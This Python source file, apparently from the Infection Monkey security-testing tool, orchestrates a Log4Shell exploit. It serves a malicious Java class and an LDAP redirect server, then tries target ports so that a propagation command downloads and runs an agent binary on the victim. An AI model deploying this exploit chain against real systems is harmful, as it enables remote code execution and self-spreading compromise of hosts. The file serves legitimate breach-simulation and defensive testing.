import logging
from typing import Sequence, Set

from common import OperatingSystem
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.types import AgentID, Event, NetworkPort, SocketAddress
from infection_monkey.exploit import (
    IAgentOTPProvider,
    IHTTPAgentBinaryServerRegistrar,
    ReservationID,
    use_agent_binary,
)
from infection_monkey.exploit.tools import HTTPBytesServer
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.network import TCPPortSelector
from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
from infection_monkey.utils.threading import interruptible_iter

from . import LINUX_EXPLOIT_TEMPLATE_PATH, WINDOWS_EXPLOIT_TEMPLATE_PATH
from .exploit_builder import build_exploit_bytecode
from .ldap_server import LDAPExploitServer
from .log4shell_command_builder import build_log4shell_command
from .log4shell_exploit_client import Log4ShellExploitClient
from .log4shell_options import Log4ShellOptions

# Module-level logger; records emitted from this file are named after this module.
logger = logging.getLogger(name=__name__)


# Timeout handed to the exploit class HTTP server's and the LDAP server's stop() calls.
SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT


class Log4ShellExploiter:
    """Attempt to exploit the Log4Shell vulnerability on a target host.

    For each attempt this class sets up three supporting pieces:

    * an Agent binary download reservation with the HTTP Agent binary server registrar,
    * an HTTP server that serves a Java class built from the propagation command, and
    * an LDAP server that redirects the victim's LDAP query to that Java class server.

    It then delegates each candidate service port to a ``Log4ShellExploitClient`` and
    tears all three pieces down once the attempt is over.
    """

    def __init__(
        self,
        agent_id: AgentID,
        log4shell_exploit_client: Log4ShellExploitClient,
        tcp_port_selector: TCPPortSelector,
        http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
        otp_provider: IAgentOTPProvider,
    ):
        self._agent_id = agent_id
        self._log4shell_exploit_client = log4shell_exploit_client
        self._tcp_port_selector = tcp_port_selector
        self._http_agent_binary_server_registrar = http_agent_binary_server_registrar
        self._otp_provider = otp_provider

    def exploit_host(
        self,
        target_host: TargetHost,
        ports_to_try: Set[NetworkPort],
        servers: Sequence[str],
        current_depth: int,
        options: Log4ShellOptions,
        interrupt: Event,
    ) -> ExploiterResult:
        """Run the Log4Shell exploit against ``target_host``.

        :param target_host: The host to exploit
        :param ports_to_try: Service ports to attempt; iteration stops at the first port
                             on which exploitation succeeds
        :param servers: Servers passed to the propagation command builder
        :param current_depth: Current propagation depth, passed to the command builder
        :param options: Options forwarded to the exploit client
        :param interrupt: Event that stops iteration over the remaining ports; it is also
                          forwarded to the exploit client
        :return: The exploitation result. ``error_message`` is set if a supporting server
                 could not be configured or started, or if an unexpected error occurred.
        """
        self._host = target_host

        logger.info(f"Starting Log4Shell exploiter for host: {self._host.ip}")

        self._configure_servers()
        if not self._server_configured_successfully():
            msg = (
                "Could not assign ports/interfaces to one or more servers "
                "that are required for the exploit"
            )
            # No exception is being handled here, so logger.exception() would only append
            # a meaningless "NoneType: None" traceback; log a plain error instead.
            logger.error(msg)
            return ExploiterResult(error_message=msg)

        try:
            logger.debug("Starting the Agent binary server")
            download_ticket = self._http_agent_binary_server_registrar.reserve_download(
                target_host.operating_system, target_host.ip, use_agent_binary
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to start the Agent binary HTTP "
                f"server: {err}"
            )
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        command = build_log4shell_command(
            self._agent_id,
            self._host,
            servers,
            current_depth,
            download_ticket.download_url,
            self._otp_provider.get_otp(),
        )

        # Start HTTP server to serve malicious java class to victim
        try:
            self._start_class_http_server(command)
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to start the "
                f"exploit class HTTP server: {err}"
            )
            logger.exception(msg)

            _clear_agent_binary_reservation(
                self._http_agent_binary_server_registrar, download_ticket.id
            )

            return ExploiterResult(error_message=msg)

        # Start LDAP server to redirect LDAP query to java class server
        try:
            self._start_ldap_server()
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to start the "
                f"LDAP server: {err}"
            )
            logger.exception(msg)

            _clear_agent_binary_reservation(
                self._http_agent_binary_server_registrar, download_ticket.id
            )
            self._stop_exploit_class_http_server()

            return ExploiterResult(error_message=msg)

        try:
            logger.debug(f"Running Log4Shell against host: {self._host.ip}")
            return self._exploit_ports(
                options,
                download_ticket.download_completed,
                interrupt,
                ports_to_try,
                command,
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to exploit the host "
                f'"{self._host.ip}" with the Log4Shell exploiter: {err}'
            )
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
        finally:
            # All three supporting pieces are running at this point; release them no
            # matter how the exploitation attempt ended.
            _clear_agent_binary_reservation(
                self._http_agent_binary_server_registrar, download_ticket.id
            )
            self._stop_exploit_class_http_server()
            self._stop_ldap_server()

    def _configure_servers(self):
        """Choose the ports and interface the LDAP and exploit class HTTP servers will use.

        Also resets both server handles to ``None`` so that a previous attempt's servers
        are never reused. A ``None`` port/IP is reported as a failure by
        ``_server_configured_successfully()``.
        """
        self._ldap_port = self._tcp_port_selector.get_free_tcp_port()

        self._class_http_server_ip = get_interface_to_target(str(self._host.ip))
        self._class_http_server_port = self._tcp_port_selector.get_free_tcp_port()

        self._ldap_server = None
        self._exploit_class_http_server = None

    def _server_configured_successfully(self) -> bool:
        """Return True if every port/IP chosen by ``_configure_servers()`` is set.

        Checking these beforehand keeps them from causing unexpected exceptions when the
        servers are started, and avoids reserving an Agent binary download for nothing.
        """
        required_settings = (
            self._ldap_port,
            self._class_http_server_ip,
            self._class_http_server_port,
        )
        return all(value is not None for value in required_settings)

    def _start_class_http_server(self, command: str):
        """Build the exploit Java class for ``command`` and start serving it over HTTP."""
        java_class = self._build_java_class(command)
        self._exploit_class_http_server = HTTPBytesServer(
            SocketAddress(ip=self._class_http_server_ip, port=self._class_http_server_port),
            java_class,
        )
        self._exploit_class_http_server.start()

    def _build_java_class(self, exploit_command: str) -> bytes:
        """Return Java bytecode that embeds ``exploit_command``.

        Linux targets use the Linux template; every other OS uses the Windows template.
        """
        if OperatingSystem.LINUX == self._host.operating_system:
            return build_exploit_bytecode(exploit_command, LINUX_EXPLOIT_TEMPLATE_PATH)
        else:
            return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)

    def _start_ldap_server(self):
        """Start the LDAP server that points the victim at the exploit class HTTP server."""
        self._ldap_server = LDAPExploitServer(
            ldap_server_port=self._ldap_port,  # type: ignore [arg-type]
            http_server_ip=self._class_http_server_ip,  # type: ignore [arg-type]
            http_server_port=self._class_http_server_port,  # type: ignore [arg-type]
            storage_dir=get_monkey_dir_path(),
        )
        self._ldap_server.run()

    def _exploit_ports(
        self,
        options: Log4ShellOptions,
        agent_binary_downloaded: Event,
        interrupt: Event,
        ports_to_try: Set[NetworkPort],
        command: str,
    ) -> ExploiterResult:
        """Try each port in turn until exploitation succeeds or ``interrupt`` is set.

        :return: The result of the last attempted port, or a default ``ExploiterResult``
                 if no port was attempted
        """
        exploit_result = ExploiterResult()

        for port in interruptible_iter(ports_to_try, interrupt):
            logger.debug(f"Attempting to exploit host: {self._host.ip} on port: {port}")
            (
                exploit_result.exploitation_success,
                exploit_result.propagation_success,
            ) = self._log4shell_exploit_client.exploit(
                target_host=self._host,
                options=options,
                ldap_port=self._ldap_port,
                agent_binary_downloaded=agent_binary_downloaded,
                exploit_class_downloaded=self._exploit_class_http_server.bytes_downloaded,
                service_port=port,
                interrupt=interrupt,
            )

            if exploit_result.exploitation_success is True:
                break

        return exploit_result

    def _stop_exploit_class_http_server(self):
        """Stop the exploit class HTTP server; failures are logged, never raised."""
        if self._exploit_class_http_server is None:
            # Never created, so there is nothing to stop. Calling stop() on None would only
            # log a misleading "unexpected error" for an AttributeError.
            return

        try:
            logger.debug("Stopping the exploit class HTTP server")
            self._exploit_class_http_server.stop(SERVER_SHUTDOWN_TIMEOUT)
        except Exception:
            logger.exception(
                "An unexpected error occurred while stopping the exploit class HTTP server"
            )

    def _stop_ldap_server(self):
        """Stop the LDAP server; failures are logged, never raised."""
        if self._ldap_server is None:
            # Never created, so there is nothing to stop.
            return

        try:
            logger.debug("Stopping the LDAP server")
            self._ldap_server.stop(SERVER_SHUTDOWN_TIMEOUT)
        except Exception:
            logger.exception("An unexpected error occurred while stopping the LDAP server")


def _clear_agent_binary_reservation(
    http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
    reservation_id: ReservationID,
):
    """Release an Agent binary download reservation on a best-effort basis.

    Callers use this during cleanup, so it never raises. Any error from the registrar is
    logged together with its traceback and then suppressed.

    :param http_agent_binary_server_registrar: The registrar that issued the reservation
    :param reservation_id: ID of the reservation to clear
    """
    try:
        logger.debug("Clearing the Agent binary download reservation")
        clear_reservation = http_agent_binary_server_registrar.clear_reservation
        clear_reservation(reservation_id)
    except Exception:
        failure_message = (
            "An unexpected error occurred while clearing the Agent binary download reservation"
        )
        logger.exception(failure_message)
